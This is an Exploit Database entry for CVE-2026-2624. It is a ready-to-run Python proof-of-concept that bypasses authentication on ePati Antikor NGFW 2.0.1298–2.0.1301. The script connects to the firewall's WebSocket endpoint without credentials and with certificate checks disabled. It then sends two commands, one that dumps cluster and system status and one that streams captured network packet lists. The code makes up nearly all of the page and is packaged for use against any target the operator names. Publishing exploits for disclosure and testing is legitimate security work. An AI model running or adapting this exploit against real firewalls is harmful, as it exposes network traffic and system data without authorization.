This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING ePati Antikor NGFW 2.0.1301 - Authentication Bypass EDB-ID: 52562 CVE: 2026-2624 EDB Verified: Author: SADIK Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-05-14 Vulnerable App: # Exploit Title: ePati Antikor NGFW 2.0.1301 - Authentication Bypass # Date: 2026-04-13 # Exploit Author: [SADIK ERTÜRK] # Vendor Homepage: https://www.epati.com.tr/ # Software Link: https://www.epati.com.tr/antikor-ngfw/ # Version: v.2.0.1298 - v.2.0.1301 # Tested on: Linux / Antikor OS # CVE: CVE-2026-2624 import websocket import json import ssl import sys import argparse import random import string import time def banner(): print("-" * 65) print(" ePati Antikor NGFW Unauthenticated WebSocket Exploit") print(" CVE-2026-2624 | Author: [SADIK ERTÜRK]") print("-" * 65) def generate_random_id(length=8): """Generates a random session ID for the SockJS connection.""" return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length)) def exploit(target_ip, target_port): # Generating random server and session IDs for SockJS server_id = random.randint(100, 999) session_id = generate_random_id() ws_url = f"wss://{target_ip}:{target_port}/sock/{server_id}/{session_id}/websocket" print(f"[*] Target WebSocket URL created: {ws_url}") print("[*] Connecting to the target... (Ignoring SSL certificate warnings)") try: # Bypassing Self-Signed SSL certificate verifications ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE}) ws.connect(ws_url) print("[+] Connection Successful! (Authentication bypassed)\n") # Payload 1: Listening to Cluster and System Status payload_1 = json.dumps(["{\"istekId\":\"req_init_01\",\"komut\":\"rapor-dinle\",\"parametreler\":[\"cluster-durum\"]}"]) print("[*] Sending 1st payload: 'rapor-dinle' (cluster-status)...") ws.send(payload_1) # Wait for the response from the server time.sleep(1) response_1 = ws.recv() if response_1: print("[+] SUCCESSFUL! Sensitive system data successfully leaked:") print(f"> {response_1}\n") # Payload 2: Listening to Network Packets payload_2 = json.dumps(["{\"istekId\":\"req_101\",\"komut\":\"paket-liste-dinle\",\"parametreler\":[]}"]) print("[*] Sending 2nd payload: 'paket-liste-dinle' (network-packet-list)...") ws.send(payload_2) time.sleep(1) response_2 = ws.recv() if response_2: print("[+] Network packet data captured:") print(f"> {response_2}\n") print("[*] Exploitation complete. Closing connection.") ws.close() except websocket.WebSocketException as e: print(f"[-] WebSocket Error: {e}") print("[-] The target might be patched (v.2.0.1302+) or the port is closed.") sys.exit(1) except Exception as e: print(f"[-] An unexpected error occurred: {e}") sys.exit(1) if __name__ == "__main__": banner() # Argument parsing parser = argparse.ArgumentParser(description="ePati Antikor NGFW WebSocket Auth Bypass PoC") parser.add_argument("-t", "--target", required=True, help="Target IP or Hostname (e.g., 192.168.1.10)") parser.add_argument("-p", "--port", default="8800", help="Target Port (Default: 8800)") args = parser.parse_args() exploit(args.target, args.port) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.